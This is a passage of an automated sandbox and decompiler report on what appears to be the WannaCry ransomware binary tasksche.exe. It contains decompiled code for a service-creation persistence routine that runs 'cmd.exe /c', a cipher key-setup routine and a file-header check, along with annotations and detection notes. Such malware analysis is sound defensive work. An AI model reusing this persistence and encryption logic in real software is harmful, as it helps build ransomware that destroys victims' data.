                                                                                															_t194 = _t278 + _t212;
                                                                                															_t278 = _t278 + 4;
                                                                                															 *(_t281 + 0x11c) = E00406B02(_t271,  *_t194 & 0x000000ff | (0 << 0x00000008 | _t271) << 0x00000008);
                                                                                															_t185 = _a11;
                                                                                															 *(_t281 + 0x120) = _t271;
                                                                                														}
                                                                                														if(_t185 != 0) {
                                                                                															_t270 =  *(_t278 + _t212 + 1) & 0x000000ff;
                                                                                															_t190 = _t278 + _t212;
                                                                                															_t278 = _t278 + 4;
                                                                                															 *(_t281 + 0x10c) = E00406B02(_t270,  *_t190 & 0x000000ff | (0 << 0x00000008 | _t270) << 0x00000008);
                                                                                															 *(_t281 + 0x110) = _t270;
                                                                                														}
                                                                                														if(_v5 != 0) {
                                                                                															_t269 =  *(_t278 + _t212 + 1) & 0x000000ff;
                                                                                															 *(_t281 + 0x114) = E00406B02(_t269,  *(_t278 + _t212) & 0x000000ff | (0 << 0x00000008 | _t269) << 0x00000008);
                                                                                															 *(_t281 + 0x118) = _t269;
                                                                                														}
                                                                                														goto L57;
                                                                                													}
                                                                                												}
                                                                                												goto L31;
                                                                                											}
                                                                                										}
                                                                                										_t274 =  &(_t274[2]);
                                                                                										goto L21;
                                                                                									}
                                                                                									_push(_v12);
                                                                                									L004076E8();
                                                                                									goto L19;
                                                                                								}
                                                                                								return 0x700;
                                                                                							}
                                                                                							E00406520(_t133);
                                                                                							L11:
                                                                                							_pop(_t213);
                                                                                							goto L12;
                                                                                						}
                                                                                						E004064E2(_t213, _t132);
                                                                                						goto L11;
                                                                                					}
                                                                                					goto L8;
                                                                                				} else {
                                                                                					if(_t272 == _t208) {
                                                                                						L8:
                                                                                						_t204 = _a8;
                                                                                						 *_t204 =  *((intOrPtr*)( *_t280 + 4));
                                                                                						 *((char*)(_t204 + 4)) = 0;
                                                                                						 *((intOrPtr*)(_t204 + 0x108)) = 0;
                                                                                						 *((intOrPtr*)(_t204 + 0x10c)) = 0;
                                                                                						 *((intOrPtr*)(_t204 + 0x110)) = 0;
                                                                                						 *((intOrPtr*)(_t204 + 0x114)) = 0;
                                                                                						 *((intOrPtr*)(_t204 + 0x118)) = 0;
                                                                                						 *((intOrPtr*)(_t204 + 0x11c)) = 0;
                                                                                						 *((intOrPtr*)(_t204 + 0x120)) = 0;
                                                                                						 *((intOrPtr*)(_t204 + 0x124)) = 0;
                                                                                						 *((intOrPtr*)(_t204 + 0x128)) = 0;
                                                                                						L60:
                                                                                						return 0;
                                                                                					}
                                                                                					memcpy(_a8, _t280 + 8, 0x12c);
                                                                                					goto L60;
                                                                                				}
                                                                                			}
                                                                                0x00406c40
                                                                                0x00406c40
                                                                                0x00406c4c
                                                                                0x00406c4f
                                                                                0x00406c52
                                                                                0x00406c56
                                                                                0x00406c59
                                                                                0x00407064
                                                                                0x00000000
                                                                                0x00407064
                                                                                0x00406c5f
                                                                                0x00406c64
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406c6d
                                                                                0x00406c70
                                                                                0x00406c75
                                                                                0x00406c75
                                                                                0x00406c7c
                                                                                0x00406c7f
                                                                                0x00406ca0
                                                                                0x00406cec
                                                                                0x00406cf1
                                                                                0x00406cfa
                                                                                0x00406cfa
                                                                                0x00406cff
                                                                                0x00406d21
                                                                                0x00406d3e
                                                                                0x00406d52
                                                                                0x00406d5c
                                                                                0x00406d89
                                                                                0x00000000
                                                                                0x00406d89
                                                                                0x00406d5e
                                                                                0x00406d61
                                                                                0x00406d68
                                                                                0x00406d7e
                                                                                0x00406d95
                                                                                0x00406d9b
                                                                                0x00406dab
                                                                                0x00406db0
                                                                                0x00406db8
                                                                                0x00406dbe
                                                                                0x00406dbe
                                                                                0x00406dbe
                                                                                0x00406dc2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406dd0
                                                                                0x00406dd6
                                                                                0x00000000
                                                                                0x00406dd9
                                                                                0x00406ddf
                                                                                0x00406de5
                                                                                0x00406e11
                                                                                0x00406e11
                                                                                0x00406e11
                                                                                0x00000000
                                                                                0x00406e11
                                                                                0x00406ded
                                                                                0x00406df3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406dfb
                                                                                0x00406e01
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406e09
                                                                                0x00406e0f
                                                                                0x00406e1b
                                                                                0x00406e20
                                                                                0x00406e28
                                                                                0x00406e2c
                                                                                0x00406e3c
                                                                                0x00406e3e
                                                                                0x00406e41
                                                                                0x00406e44
                                                                                0x00406e46
                                                                                0x00406e61
                                                                                0x00406e6b
                                                                                0x00406e6d
                                                                                0x00406e78
                                                                                0x00406e7a
                                                                                0x00406e7c
                                                                                0x00406e7c
                                                                                0x00406e7e
                                                                                0x00406e82
                                                                                0x00406e88
                                                                                0x00406e8a
                                                                                0x00406e8a
                                                                                0x00406e96
                                                                                0x00406e98
                                                                                0x00406e98
                                                                                0x00406ea3
                                                                                0x00406ea5
                                                                                0x00406ea5
                                                                                0x00406eae
                                                                                0x00406eb0
                                                                                0x00406eb0
                                                                                0x00406ebb
                                                                                0x00406ebd
                                                                                0x00406ebd
                                                                                0x00406eca
                                                                                0x00406ed3

                                                                                APIs
                                                                                • memcpy.MSVCRT(?,?,0000012C,?), ref: 00406C91
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID: /../$/..\$\../$\..\
                                                                                • API String ID: 3510742995-3885502717
                                                                                • Opcode ID: 24419fe79de55b9e050378da4d3ae0875fe08eefc49193e89ac78033597620dd
                                                                                • Instruction ID: 8d35de4500b3f4065ad8a7d009fa2f60231b6be20ed9f01f65d9d1a3966dd706
                                                                                • Opcode Fuzzy Hash: 24419fe79de55b9e050378da4d3ae0875fe08eefc49193e89ac78033597620dd
                                                                                • Instruction Fuzzy Hash: 98D147729082459FDB15CF68C881AEABBF4EF05300F15857FE49AB7381C738A915CB98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00401CE8(intOrPtr _a4) {
                                                                                				/* Decompiled service-installation routine (annotations added by the editor).
                                                                                				   Opens the Service Control Manager, tries to open an existing service whose
                                                                                				   name lives at 0x40f8ac (string not recovered in this dump); if it does not
                                                                                				   exist, creates it with the command line cmd.exe /c "<_a4>" and starts it.
                                                                                				   Returns 1 when a service was started, 0 when the SCM could not be opened.
                                                                                				   Detection note: on the host this surfaces as a new-service event (System log
                                                                                				   7045 / Security 4697) whose ImagePath begins with cmd.exe /c. */
                                                                                				void* _v8;        // SCM handle
                                                                                				int _v12;         // result flag for the create-and-start path
                                                                                				void* _v16;       // handle of the already-existing service
                                                                                				char _v1040;      // 1024-byte buffer for the formatted command line
                                                                                				void* _t12;
                                                                                				void* _t13;
                                                                                				void* _t31;
                                                                                				int _t32;
                                                                                
                                                                                				_v12 = 0;
                                                                                				_t12 = OpenSCManagerA(0, 0, 0xf003f);               // 0xF003F == SC_MANAGER_ALL_ACCESS
                                                                                				_v8 = _t12;
                                                                                				if(_t12 != 0) {
                                                                                					_t13 = OpenServiceA(_t12, 0x40f8ac, 0xf01ff);    // 0xF01FF == SERVICE_ALL_ACCESS
                                                                                					_v16 = _t13;
                                                                                					if(_t13 == 0) {
                                                                                						// Service does not exist yet: build its command line from the caller's path.
                                                                                						sprintf( &_v1040, "cmd.exe /c \"%s\"", _a4);
                                                                                						// 0x10 == SERVICE_WIN32_OWN_PROCESS, 2 == SERVICE_AUTO_START, 1 == SERVICE_ERROR_NORMAL;
                                                                                						// display name and service name are the same string at 0x40f8ac.
                                                                                						_t31 = CreateServiceA(_v8, 0x40f8ac, 0x40f8ac, 0xf01ff, 0x10, 2, 1,  &_v1040, 0, 0, 0, 0, 0);
                                                                                						if(_t31 != 0) {
                                                                                							StartServiceA(_t31, 0, 0);
                                                                                							CloseServiceHandle(_t31);
                                                                                							_v12 = 1;
                                                                                						}
                                                                                						_t32 = _v12;
                                                                                					} else {
                                                                                						// Service already installed: just (re)start it.
                                                                                						StartServiceA(_t13, 0, 0);
                                                                                						CloseServiceHandle(_v16);
                                                                                						_t32 = 1;
                                                                                					}
                                                                                					CloseServiceHandle(_v8);
                                                                                					return _t32;
                                                                                				}
                                                                                				return 0;
                                                                                			}


                                                                                APIs
                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00401CFE
                                                                                • OpenServiceA.ADVAPI32(00000000,0040F8AC,000F01FF), ref: 00401D21
                                                                                • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00401D31
                                                                                • CloseServiceHandle.ADVAPI32(?), ref: 00401D3A
                                                                                • CloseServiceHandle.ADVAPI32(?), ref: 00401D9E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$CloseHandleOpen$ManagerStart
                                                                                • String ID: cmd.exe /c "%s"
                                                                                • API String ID: 1485051382-955883872
                                                                                • Opcode ID: 4dc5d8109ff1f89eb2c8b95274d01a87daa9a34efcc40f147da3f0b4c8cffa2a
                                                                                • Instruction ID: 93977d8af42d47d1d9866270745c8e9c50065656b45fe828c5c40e24baaa5e60
                                                                                • Opcode Fuzzy Hash: 4dc5d8109ff1f89eb2c8b95274d01a87daa9a34efcc40f147da3f0b4c8cffa2a
                                                                                • Instruction Fuzzy Hash: 6411AF71900118BBDB205B659E4CE9FBF7CEF85745F10407AF601F21A0CA744949DB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 54%
                                                                                			E00402A76(void* __ecx, signed int _a4, void* _a6, void* _a7, signed int _a8, signed int _a12, signed char* _a16) {
                                                                                				/* Editor's annotation (inference from the visible code, not stated by the report):
                                                                                				   this looks like a block-cipher key-setup routine. It rejects a null key (_a4),
                                                                                				   accepts only key and block sizes of 0x10, 0x18 or 0x20 bytes (_a12, _a16),
                                                                                				   copies the key material into the object at __ecx, and derives a round count
                                                                                				   (stored at __ecx+0x410) from the two sizes. The exception path constructs an
                                                                                				   exception object and calls the thrower at 0x40776E. */
                                                                                				signed int _v8;
                                                                                				signed int _v12;
                                                                                				char _v24;
                                                                                				int _t193;
                                                                                				signed int _t198;
                                                                                				int _t199;
                                                                                				intOrPtr _t200;
                                                                                				signed int* _t205;
                                                                                				signed char* _t206;
                                                                                				signed int _t208;
                                                                                				signed int _t210;
                                                                                				signed int* _t216;
                                                                                				signed int _t217;
                                                                                				signed int* _t220;
                                                                                				signed int* _t229;
                                                                                				void* _t252;
                                                                                				void* _t280;
                                                                                				void* _t281;
                                                                                				signed int _t283;
                                                                                				signed int _t289;
                                                                                				signed int _t290;
                                                                                				signed char* _t291;
                                                                                				signed int _t292;
                                                                                				void* _t303;
                                                                                				void* _t313;
                                                                                				intOrPtr* _t314;
                                                                                				void* _t315;
                                                                                				intOrPtr* _t316;
                                                                                				signed char* _t317;
                                                                                				signed char* _t319;
                                                                                				signed int _t320;
                                                                                				signed int _t322;
                                                                                				void* _t326;
                                                                                				void* _t327;
                                                                                				signed int _t329;
                                                                                				signed int _t337;
                                                                                				intOrPtr _t338;
                                                                                				signed int _t340;
                                                                                				intOrPtr _t341;
                                                                                				void* _t342;
                                                                                				signed int _t345;
                                                                                				signed int* _t346;
                                                                                				signed int _t347;
                                                                                				void* _t352;
                                                                                				void* _t353;
                                                                                				void* _t354;
                                                                                
                                                                                				_t352 = __ecx;
                                                                                				if(_a4 == 0) {
                                                                                					_a8 = 0x40f57c;
                                                                                					__imp__??0exception@@QAE@ABQBD@Z( &_a8);
                                                                                					_push(0x40d570);
                                                                                					_push( &_v24);
                                                                                					L0040776E();
                                                                                				}
                                                                                				_t283 = _a12;
                                                                                				_t252 = 0x18;
                                                                                				_t342 = 0x10;
                                                                                				if(_t283 != _t342 && _t283 != _t252 && _t283 != 0x20) {
                                                                                					_t283 =  &_v24;
                                                                                					_a8 = 0x40f57c;
                                                                                					__imp__??0exception@@QAE@ABQBD@Z( &_a8);
                                                                                					_push(0x40d570);
                                                                                					_push( &_v24);
                                                                                					L0040776E();
                                                                                				}
                                                                                				_t193 = _a16;
                                                                                				if(_t193 != _t342 && _t193 != _t252 && _t193 != 0x20) {
                                                                                					_t283 =  &_v24;
                                                                                					_a8 = 0x40f57c;
                                                                                					__imp__??0exception@@QAE@ABQBD@Z( &_a8);
                                                                                					_t193 =  &_v24;
                                                                                					_push(0x40d570);
                                                                                					_push(_t193);
                                                                                					L0040776E();
                                                                                				}
                                                                                				 *(_t352 + 0x3cc) = _t193;
                                                                                				 *(_t352 + 0x3c8) = _t283;
                                                                                				memcpy(_t352 + 0x3d0, _a8, _t193);
                                                                                				memcpy(_t352 + 0x3f0, _a8,  *(_t352 + 0x3cc));
                                                                                				_t198 =  *(_t352 + 0x3c8);
                                                                                				_t354 = _t353 + 0x18;
                                                                                				// Round-count selection (editor's reading): size 0x10 with 0x10 gives 0xa;
                                                                                				// the masked expressions yield 0xc when the other size is 0x18 and 0xe otherwise.
                                                                                				if(_t198 == _t342) {
                                                                                					_t199 =  *(_t352 + 0x3cc);
                                                                                					if(_t199 != _t342) {
                                                                                						_t200 = ((0 | _t199 != _t252) - 0x00000001 & 0xfffffffe) + 0xe;
                                                                                					} else {
                                                                                						_t200 = 0xa;
                                                                                					}
                                                                                					goto L17;
                                                                                				} else {
                                                                                					if(_t198 == _t252) {
                                                                                						_t200 = ((0 |  *(_t352 + 0x3cc) == 0x00000020) - 0x00000001 & 0x000000fe) + 0xe;
                                                                                						L17:
                                                                                						 *((intOrPtr*)(_t352 + 0x410)) = _t200;
                                                                                						L18:
                                                                                						asm("cdq");
                                                                                						_t289 = 4;
                                                                                						_t326 = 0;
                                                                                						_a12 =  *(_t352 + 0x3cc) / _t289;
                                                                                						if( *((intOrPtr*)(_t352 + 0x410)) < 0) {
                                                                                							L23:
                                                                                							_t327 = 0;
                                                                                							if( *((intOrPtr*)(_t352 + 0x410)) < 0) {
                                                                                								L28:
                                                                                								asm("cdq");
                                                                                								_t290 = 4;
                                                                                								_t291 = _a4;
                                                                                								_t345 = ( *((intOrPtr*)(_t352 + 0x410)) + 1) * _a12;
                                                                                								_v12 = _t345;
                                                                                								_t329 =  *(_t352 + 0x3c8) / _t290;
                                                                                								_t205 = _t352 + 0x414;
                                                                                								_v8 = _t329;
                                                                                								if(_t329 <= 0) {
                                                                                									L31:
                                                                                									_a8 = _a8 & 0x00000000;
                                                                                									if(_t329 <= 0) {
                                                                                										L35:
                                                                                										if(_a8 >= _t345) {
                                                                                											L51:
                                                                                											_t206 = 1;
                                                                                											_a16 = _t206;
                                                                                											if( *((intOrPtr*)(_t352 + 0x410)) <= _t206) {
                                                                                												L57:
                                                                                												 *((char*)(_t352 + 4)) = 1;
                                                                                												return _t206;
                                                                                											}
                                                                                											_a8 = _t352 + 0x208;
                                                                                											do {
                                                                                												_t292 = _a12;
                                                                                												if(_t292 <= 0) {
                                                                                													goto L56;
                                                                                												}
                                                                                												_t346 = _a8;
                                                                                												do {
                                                                                													_t208 =  *_t346;
                                                                                													_a4 = _t208;
                                                                                													 *_t346 =  *0x0040ABFC ^  *0x0040AFFC ^  *0x0040B3FC ^  *(0x40b7fc + (_t208 & 0x000000ff) * 4);
                                                                                													_t346 =  &(_t346[1]);
                                                                                													_t292 = _t292 - 1;
                                                                                												} while (_t292 != 0);
                                                                                												L56:
                                                                                												_a16 =  &(_a16[1]);
                                                                                												_a8 = _a8 + 0x20;
                                                                                												_t206 = _a16;
                                                                                											} while (_t206 <  *((intOrPtr*)(_t352 + 0x410)));
                                                                                											goto L57;
                                                                                										}
                                                                                										_a16 = 0x40bbfc;
                                                                                										do {
                                                                                											_t210 =  *(_t352 + 0x410 + _t329 * 4);
                                                                                											_a4 = _t210;
                                                                                											 *(_t352 + 0x414) =  *(_t352 + 0x414) ^ ((( *0x004089FC ^  *_a16) << 0x00000008 ^  *0x004089FC & 0x000000ff) << 0x00000008 ^  *((_t210 & 0x000000ff) + 0x4089fc) & 0x000000ff) << 0x00000008 ^  *0x004089FC & 0x000000ff;
                                                                                											_a16 = _a16 + 1;
                                                                                											if(_t329 == 8) {
                                                                                												_t216 = _t352 + 0x418;
                                                                                												_t303 = 3;
                                                                                												do {
                                                                                													 *_t216 =  *_t216 ^  *(_t216 - 4);
                                                                                													_t216 =  &(_t216[1]);
                                                                                													_t303 = _t303 - 1;
                                                                                												} while (_t303 != 0);
                                                                                												_t217 =  *(_t352 + 0x420);
                                                                                												_a4 = _t217;
                                                                                												_t220 = _t352 + 0x428;
                                                                                												 *(_t352 + 0x424) =  *(_t352 + 0x424) ^ (( *0x004089FC << 0x00000008 ^  *0x004089FC & 0x000000ff) << 0x00000008 ^  *0x004089FC & 0x000000ff) << 0x00000008 ^  *((_t217 & 0x000000ff) + 0x4089fc) & 0x000000ff;
                                                                                												_t313 = 3;
                                                                                												do {
                                                                                													 *_t220 =  *_t220 ^  *(_t220 - 4);
                                                                                													_t220 =  &(_t220[1]);
                                                                                													_t313 = _t313 - 1;
                                                                                												} while (_t313 != 0);
                                                                                												L46:
                                                                                												_a4 = _a4 & 0x00000000;
                                                                                												if(_t329 <= 0) {
                                                                                													goto L50;
                                                                                												}
                                                                                												_t314 = _t352 + 0x414;
                                                                                												while(_a8 < _t345) {
                                                                                													asm("cdq");
                                                                                													_t347 = _a8 / _a12;
                                                                                													asm("cdq");
                                                                                													_t337 = _a8 % _a12;
                                                                                													 *((intOrPtr*)(_t352 + 8 + (_t337 + _t347 * 8) * 4)) =  *_t314;
                                                                                													_a4 = _a4 + 1;
                                                                                													_t345 = _v12;
                                                                                													_t338 =  *_t314;
                                                                                													_t314 = _t314 + 4;
                                                                                													_a8 = _a8 + 1;
                                                                                													 *((intOrPtr*)(_t352 + 0x1e8 + (_t337 + ( *((intOrPtr*)(_t352 + 0x410)) - _t347) * 8) * 4)) = _t338;
                                                                                													_t329 = _v8;
                                                                                													if(_a4 < _t329) {
                                                                                														continue;
                                                                                													}
                                                                                													goto L50;
                                                                                												}
                                                                                												goto L51;
                                                                                											}
                                                                                											if(_t329 <= 1) {
                                                                                												goto L46;
                                                                                											}
                                                                                											_t229 = _t352 + 0x418;
                                                                                											_t315 = _t329 - 1;
                                                                                											do {
                                                                                												 *_t229 =  *_t229 ^  *(_t229 - 4);
                                                                                												_t229 =  &(_t229[1]);
                                                                                												_t315 = _t315 - 1;
                                                                                											} while (_t315 != 0);
                                                                                											goto L46;
                                                                                											L50:
                                                                                										} while (_a8 < _t345);
                                                                                										goto L51;
                                                                                									}
                                                                                									_t316 = _t352 + 0x414;
                                                                                									while(_a8 < _t345) {
                                                                                										asm("cdq");
                                                                                										_a4 = _a8 / _a12;
                                                                                										asm("cdq");
                                                                                										_t340 = _a8 % _a12;
                                                                                										 *((intOrPtr*)(_t352 + 8 + (_t340 + _a4 * 8) * 4)) =  *_t316;
                                                                                										_a8 = _a8 + 1;
                                                                                										_t341 =  *_t316;
                                                                                										_t316 = _t316 + 4;
                                                                                										 *((intOrPtr*)(_t352 + 0x1e8 + (_t340 + ( *((intOrPtr*)(_t352 + 0x410)) - _a4) * 8) * 4)) = _t341;
                                                                                										_t329 = _v8;
                                                                                										if(_a8 < _t329) {
                                                                                											continue;
                                                                                										}
                                                                                										goto L35;
                                                                                									}
                                                                                									goto L51;
                                                                                								}
                                                                                								_a8 = _t329;
                                                                                								do {
                                                                                									_t317 =  &(_t291[1]);
                                                                                									 *_t205 = ( *_t291 & 0x000000ff) << 0x18;
                                                                                									 *_t205 =  *_t205 | ( *_t317 & 0x000000ff) << 0x00000010;
                                                                                									_t319 =  &(_t317[2]);
                                                                                									 *_t205 =  *_t205 |  *_t319 & 0x000000ff;
                                                                                									_t291 =  &(_t319[1]);
                                                                                									_t205 =  &(_t205[1]);
                                                                                									_t60 =  &_a8;
                                                                                									 *_t60 = _a8 - 1;
                                                                                								} while ( *_t60 != 0);
                                                                                								goto L31;
                                                                                							}
                                                                                							_t280 = _t352 + 0x1e8;
                                                                                							do {
                                                                                								_t320 = _a12;
                                                                                								if(_t320 > 0) {
                                                                                									memset(_t280, 0, _t320 << 2);
                                                                                									_t354 = _t354 + 0xc;
                                                                                								}
                                                                                								_t327 = _t327 + 1;
                                                                                								_t280 = _t280 + 0x20;
                                                                                							} while (_t327 <=  *((intOrPtr*)(_t352 + 0x410)));
                                                                                							goto L28;
                                                                                						}
                                                                                						_t281 = _t352 + 8;
                                                                                						do {
                                                                                							_t322 = _a12;
                                                                                							if(_t322 > 0) {
                                                                                								memset(_t281, 0, _t322 << 2);
                                                                                								_t354 = _t354 + 0xc;
                                                                                							}
                                                                                							_t326 = _t326 + 1;
                                                                                							_t281 = _t281 + 0x20;
                                                                                						} while (_t326 <=  *((intOrPtr*)(_t352 + 0x410)));
                                                                                						goto L23;
                                                                                					}
                                                                                					 *((intOrPtr*)(_t352 + 0x410)) = 0xe;
                                                                                					goto L18;
                                                                                				}
                                                                                			}

                                                                                0x00402c93
                                                                                0x00402c96
                                                                                0x00402c9d
                                                                                0x00402ca3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402ca3
                                                                                0x00000000
                                                                                0x00402c5c
                                                                                0x00402c24
                                                                                0x00402c27
                                                                                0x00402c2d
                                                                                0x00402c2e
                                                                                0x00402c36
                                                                                0x00402c3f
                                                                                0x00402c43
                                                                                0x00402c45
                                                                                0x00402c46
                                                                                0x00402c49
                                                                                0x00402c49
                                                                                0x00402c49
                                                                                0x00000000
                                                                                0x00402c27
                                                                                0x00402bd9
                                                                                0x00402bdf
                                                                                0x00402bdf
                                                                                0x00402be4
                                                                                0x00402bea
                                                                                0x00402bea
                                                                                0x00402bea
                                                                                0x00402bec
                                                                                0x00402bed
                                                                                0x00402bf0
                                                                                0x00000000
                                                                                0x00402bdf
                                                                                0x00402bb3
                                                                                0x00402bb6
                                                                                0x00402bb6
                                                                                0x00402bbb
                                                                                0x00402bc1
                                                                                0x00402bc1
                                                                                0x00402bc1
                                                                                0x00402bc3
                                                                                0x00402bc4
                                                                                0x00402bc7
                                                                                0x00000000
                                                                                0x00402bb6
                                                                                0x00402b55
                                                                                0x00000000
                                                                                0x00402b55

                                                                                APIs
                                                                                • ??0exception@@QAE@ABQBD@Z.MSVCRT(?,?,?,00000000,00000010,?), ref: 00402A95
                                                                                • _CxxThrowException.MSVCRT(00000010,0040D570,?,00000000,00000010,?), ref: 00402AA4
                                                                                • ??0exception@@QAE@ABQBD@Z.MSVCRT(?,?,?,00000000,00000010,?), ref: 00402ACD
                                                                                • _CxxThrowException.MSVCRT(00000010,0040D570,?,00000000,00000010,?), ref: 00402ADC
                                                                                • ??0exception@@QAE@ABQBD@Z.MSVCRT(?,?,?,00000000,00000010,?), ref: 00402AFF
                                                                                • _CxxThrowException.MSVCRT(00000010,0040D570,?,00000000,00000010,?), ref: 00402B0E
                                                                                • memcpy.MSVCRT(?,?,00000010,?,?,00000000,00000010,?,?), ref: 00402B2A
                                                                                • memcpy.MSVCRT(?,?,?,?,?,00000010,?,?,00000000,00000010,?,?), ref: 00402B3F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ??0exception@@ExceptionThrow$memcpy
                                                                                • String ID:
                                                                                • API String ID: 1881450474-3916222277
                                                                                • Opcode ID: 13455132f19fce7ccee5142b200569a1d3dc411a47d032a17fbb22a214c81369
                                                                                • Instruction ID: fcfef073648f46ce18afaeffe4143d5033c2e410e09e17396796de68d512254b
                                                                                • Opcode Fuzzy Hash: 13455132f19fce7ccee5142b200569a1d3dc411a47d032a17fbb22a214c81369
                                                                                • Instruction Fuzzy Hash: 8DD1C3706006099FDB28CF29C5846EA77F5FF48314F14C43EE95AEB281D778AA85CB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040150D
                                                                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 00401529
                                                                                • memcmp.MSVCRT(?,WANACRY!,00000008), ref: 00401572
                                                                                • GlobalAlloc.KERNEL32(00000000,?,?,?,00000010,?,?,?,?), ref: 0040166D
                                                                                • _local_unwind2.MSVCRT(?,000000FF), ref: 004016D6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$AllocCreateGlobalSize_local_unwind2memcmp
                                                                                • String ID: WANACRY!
                                                                                • API String ID: 283026544-1240840912
                                                                                • Opcode ID: 3616707767261f84fde6c13708b35c3d4dbb974938da28d5f777545cb9cffa02
                                                                                • Instruction ID: 23909f9b909e50c20e483d6bc4be6e23e355ec3bf8b0a6de4718622c8bde6caa
                                                                                • Opcode Fuzzy Hash: 3616707767261f84fde6c13708b35c3d4dbb974938da28d5f777545cb9cffa02
                                                                                • Instruction Fuzzy Hash: 6E512C71900209ABDB219F95CD84FEEB7BCEB08790F1444BAF515F21A0D739AA45CB28
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 55%
                                                                                			E0040350F(void* __ecx, signed int _a4, signed char* _a8) {
                                                                                				signed int _v8;
                                                                                				signed int _v12;
                                                                                				signed char _v16;
                                                                                				signed int _v20;
                                                                                				intOrPtr _v24;
                                                                                				char _v28;
                                                                                				intOrPtr _v32;
                                                                                				intOrPtr _v36;
                                                                                				intOrPtr _v40;
                                                                                				signed int _v44;
                                                                                				char _v56;
                                                                                				signed int _t150;
                                                                                				signed int _t151;
                                                                                				signed int _t155;
                                                                                				signed int* _t157;
                                                                                				signed char _t158;
                                                                                				intOrPtr _t219;
                                                                                				signed int _t230;
                                                                                				signed char* _t236;
                                                                                				signed char* _t237;
                                                                                				signed char* _t238;
                                                                                				signed char* _t239;
                                                                                				signed int* _t240;
                                                                                				signed char* _t242;
                                                                                				signed char* _t243;
                                                                                				signed char* _t245;
                                                                                				signed int _t260;
                                                                                				signed int* _t273;
                                                                                				signed int _t274;
                                                                                				void* _t275;
                                                                                				void* _t276;
                                                                                
                                                                                				_t275 = __ecx;
                                                                                				if( *((char*)(__ecx + 4)) == 0) {
                                                                                					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
                                                                                					_push(0x40d570);
                                                                                					_push( &_v56);
                                                                                					L0040776E();
                                                                                				}
                                                                                				_t150 =  *(_t275 + 0x3cc);
                                                                                				if(_t150 == 0x10) {
                                                                                					return E00402E7E(_t275, _a4, _a8);
                                                                                				}
                                                                                				asm("cdq");
                                                                                				_t230 = 4;
                                                                                				_t151 = _t150 / _t230;
                                                                                				_t274 = _t151;
                                                                                				asm("sbb eax, eax");
                                                                                				_t155 = ( ~(_t151 - _t230) & (0 | _t274 != 0x00000006) + 0x00000001) << 5;
                                                                                				_v28 =  *((intOrPtr*)(_t155 + 0x40bc24));
                                                                                				_v24 =  *((intOrPtr*)(_t155 + 0x40bc2c));
                                                                                				_v32 =  *((intOrPtr*)(_t155 + 0x40bc34));
                                                                                				_t157 = _t275 + 0x454;
                                                                                				if(_t274 > 0) {
